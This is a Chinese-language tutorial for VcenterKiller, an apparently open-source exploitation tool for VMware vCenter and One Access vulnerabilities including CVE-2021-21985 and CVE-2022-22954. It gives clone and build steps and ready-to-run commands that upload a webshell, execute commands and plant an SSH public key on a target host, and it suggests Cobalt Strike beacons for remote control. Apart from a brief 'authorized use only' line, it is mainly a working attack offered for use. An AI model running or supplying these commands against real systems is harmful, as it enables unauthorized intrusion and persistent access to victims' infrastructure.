VcenterKiller 开源项目教程

VcenterKiller 开源项目教程

VcenterKiller一款针对Vcenter的综合利用工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j，提供一键上传webshell，命令执行或者上传公钥使用SSH免密连接项目地址:https://gitcode.com/gh_mirrors/vc/VcenterKiller

项目介绍

VcenterKiller 是一款针对 VMware Vcenter 的综合利用工具，集成了多个安全漏洞的利用功能，包括上传 webshell、命令执行和 SSH 免密登录等。该工具主要用于渗透测试，直接利用已知漏洞，适合在内网环境中使用。

项目快速启动

环境准备

• 确保已安装 Go 语言环境。
• 克隆项目到本地：

git clone https://github.com/Schira4396/VcenterKiller.git
cd VcenterKiller

编译项目

go build -o main.exe

使用示例

1. 上传 webshell：

./main.exe -u https://192.168.1.1 -m 21985 -f test.jsp

2. 命令执行：

./main.exe -u https://192.168.1.1 -m 21985 -c whoami

3. SSH 免密登录：

./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh

应用案例和最佳实践

应用案例

• 内网渗透测试：VcenterKiller 可以用于检测和利用 Vcenter 中的已知漏洞，帮助安全团队评估内网的安全性。
• 漏洞复现：安全研究人员可以使用该工具复现特定漏洞，进行深入分析和研究。

最佳实践

• 定期更新：由于漏洞利用工具的特殊性，建议定期检查并更新工具，以支持最新的漏洞利用。
• 安全使用：仅在授权的环境中使用该工具，避免非法使用。

典型生态项目

• Metasploit Framework：与 Metasploit 结合使用，可以进一步扩展渗透测试的能力。
• Cobalt Strike：通过 Cobalt Strike 的 Beacon 进行远程控制，实现更复杂的渗透测试任务。

以上是 VcenterKiller 开源项目的详细教程，希望对您有所帮助。

VcenterKiller一款针对Vcenter的综合利用工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j，提供一键上传webshell，命令执行或者上传公钥使用SSH免密连接项目地址:https://gitcode.com/gh_mirrors/vc/VcenterKiller